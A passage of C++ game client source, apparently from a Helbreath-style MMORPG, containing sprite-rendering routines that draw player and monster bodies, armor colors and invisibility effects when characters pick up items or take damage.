			else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}

		if (iBodyArmorIndex != -1)
		{	if (iArmorColor == 0)
				m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, dwTime);
			else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
		}

		if (iHelmIndex != -1)
		{	if (iHelmColor == 0)
				 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, dwTime);
			else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
		}

		if (iMantleIndex != -1)
		{	if (iMantleColor == 0)
				m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, dwTime);
			else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 16 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
		}

		if ((_tmp_iStatus & 0x20) != 0) 	// Berserk
			m_pSprite[iBodyIndex + (_tmp_cDir -1)]->PutTransSpriteRGB(sX, sY, _tmp_cFrame, 0, -5, -5, dwTime);
		DrawAngel(32+(_tmp_cDir - 1), sX+20, sY-20, _tmp_cFrame%16, dwTime);
		DrawWanted(sX, sY, dwTime);
		CheckActiveAura2(sX, sY, dwTime,  _tmp_sOwnerType);

		//50Cent - Capture The Flag
		DrawFlagCarrier(sX, sY, _tmp_cFrame, dwTime);

	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX, sY, _tmp_cName, _tmp_iStatus);
		//50Cent - HP Bar
		else
		{
			DrawNpcName(sX, sY, _tmp_sOwnerType, _tmp_iStatus);
    }    }
	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID))
		{	m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY;
		}else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}
	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) return TRUE;
	return FALSE;
}

BOOL   CGame::DrawObject_OnGetItem(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{int iBodyIndex, iUndiesIndex, iHairIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iR, iG, iB, iHelmIndex, iMantleIndex;
 BOOL bInv = FALSE;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;

	if(_tmp_sOwnerType == 35 ) bInv = TRUE; //Energy-Ball,Wyvern

	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}

	if ( (_tmp_iStatus & 0x10) != 0)
	{	if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0) bInv = TRUE;
		else if (bCheckItemEquiped("NecklaceOfBeholder") == true) bInv = TRUE; //beholder neck
		else if( _iGetFOE(_tmp_iStatus) == 1 ) bInv = TRUE;
		else return FALSE;
	}

	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (9 * 8);
		iUndiesIndex    = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 9;
		iHairIndex      = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 9;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				 iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 9;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			 iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 9;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			 iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 9;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			 iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 9;
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			 iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 9;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
			 iHelmIndex = -1;
		else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 9; 		break;

	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (9 * 8);
		iUndiesIndex    = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 9;
		iHairIndex      = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 9;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				 iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 9;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			 iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 9;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			 iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 9;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			 iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 9;
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			 iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 9;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
			 iHelmIndex = -1;
		else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 9;
		break;
	default:
		iUndiesIndex    = -1;
		iHairIndex      = -1;
		iArmArmorIndex  = -1;
		iBodyArmorIndex = -1;
		iPantsIndex     = -1;
		iBootsIndex     = -1;
		iMantleIndex    = -1;
		iHelmIndex      = -1;
		break;
	}
	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX, sY, _tmp_cFrame);

	if (_tmp_iEffectType != 0)
	{	switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
	}	}

	if (bTrans == FALSE)
	{	CheckActiveAura(sX, sY, dwTime, _tmp_sOwnerType);
		switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
		case 10: // Slime
		case 35: // Energy Sphere
		
		case 81: // Abaddon
		case 91: // Gate
			break;
		default:
			if (m_cDetailLevel != 0)
			{	if (sX < 50)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, _tmp_cFrame, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, _tmp_cFrame, dwTime);
			}
			break;
		}

		if (bInv == TRUE)
			m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite2(sX, sY, _tmp_cFrame, dwTime);
		else {
			if ((_tmp_iStatus & 0x40) != 0)
				 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
			else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
		}
		SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
			     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

		if (iUndiesIndex != -1)
		{	if(bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
			else m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
		}

		if ((iHairIndex != -1) && (iHelmIndex == -1))
		{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
			m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, iR, iG, iB, dwTime);
		}

		if ((iBootsIndex != -1) && (iSkirtDraw == 1))
		{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
			else
			{	if (iBootsColor == 0)
					m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}	}

		if (iPantsIndex != -1)
		{	if(bInv) m_pSprite[iPantsIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
			else
			{	if (iPantsColor == 0)
					m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
				else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
		}	}

		if (iArmArmorIndex != -1)
		{	if(bInv) m_pSprite[iArmArmorIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
			else
			{	if (iArmColor == 0)
					m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
				else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
		}	}

		if ((iBootsIndex != -1) && (iSkirtDraw == 0))
		{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
			else
			{	if (iBootsColor == 0)
					m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}	}

		if (iBodyArmorIndex != -1)
		{	if(bInv) m_pSprite[iBodyArmorIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
			else
			{	if (iArmorColor == 0)
					m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
				else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
		}	}

		if (iHelmIndex != -1)
		{	if(bInv) m_pSprite[iHelmIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
			else
			{	if (iHelmColor == 0)
					 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
				else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
		}	}

		if (iMantleIndex != -1)
		{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
			else
			{	if (iMantleColor == 0)
					m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 4 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
		}	}

		if ((_tmp_iStatus & 0x20) != 0) // Berserk
			m_pSprite[iBodyIndex + (_tmp_cDir -1)]->PutTransSpriteRGB(sX, sY, _tmp_cFrame, 0, -5, -5, dwTime);
		DrawAngel(40+(_tmp_cDir - 1), sX+20, sY-20, _tmp_cFrame%4, dwTime);
		DrawWanted(sX, sY, dwTime);
		CheckActiveAura2(sX, sY, dwTime,  _tmp_sOwnerType);

		//50Cent - Capture The Flag
		DrawFlagCarrier(sX, sY, _tmp_cFrame, dwTime);

	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX, sY, _tmp_cName, _tmp_iStatus);
		//50Cent - HP Bar
		else
		{
			DrawNpcName(sX, sY, _tmp_sOwnerType, _tmp_iStatus);
    }    }
	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID))
		{	m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY;
		}else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}
	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) return TRUE;
	return FALSE;
}

BOOL CGame::DrawObject_OnDamage(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{int iBodyIndex, iUndiesIndex, iHairIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iWeaponIndex, iShieldIndex, iHelmIndex, iR, iG, iB;
 int iAdd, iDrawMode, iMantleIndex;
 char cFrame;
 BOOL bInv = FALSE;
 int iWeaponGlare, iShieldGlare;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;

	if(_tmp_sOwnerType == 35 || _tmp_sOwnerType == 81 ) bInv = TRUE; //Energy-Ball,Wyvern

	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}
	iWeaponGlare = (_tmp_sAppr4 & 0x000C) >> 2;
	iShieldGlare = (_tmp_sAppr4 & 0x0003);
	if ( (_tmp_iStatus & 0x10) != 0)
	{	if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0) bInv = TRUE;
		else if (bCheckItemEquiped("NecklaceOfBeholder") == true) bInv = TRUE; //beholder neck
		else if( _iGetFOE(_tmp_iStatus) == 1 ) bInv = TRUE;
		else return FALSE;
	}
	cFrame = _tmp_cFrame;
	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		if (cFrame < 4)
		{	if ((_tmp_sAppr2 & 0xF000) != 0) iAdd = 1;
			else iAdd = 0;
			iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*iAdd + (_tmp_cDir - 1);
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
			iDrawMode = 0;
		}else
		{	cFrame -= 4;
			iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (10 * 8);
			iUndiesIndex    = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 10;
			iHairIndex      = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 10;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 10;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 10;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 10;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 10;
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 5;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*5 + (_tmp_cDir - 1);
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 10;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 10;
			iDrawMode = 1;
		}
		break;
	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		if (cFrame < 4)
		{	if ((_tmp_sAppr2 & 0xF000) != 0) iAdd = 1;
			else iAdd = 0;
			iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex   = DEF_SPRID_HAIR_W	+ ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*iAdd + (_tmp_cDir - 1);
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
			iDrawMode = 0;
		}else
		{	cFrame -= 4;
			iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (10 * 8);
			iUndiesIndex    = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 10;
			iHairIndex      = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 10;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 10;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 10;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 10;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 10;
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 5;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*5 + (_tmp_cDir - 1);
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 10;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 10;
			iDrawMode = 1;
		}
		break;

	default:
		if (cFrame < 4)
		{	if (_tmp_sAppr2 != 0)
			{	iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
				 cFrame = _tmp_sAppr2 -1;
			}
			else if (_tmp_sOwnerType == 66) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 67) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 68) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 69) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 73) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			else if (_tmp_sOwnerType == 81) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 86) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 87) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
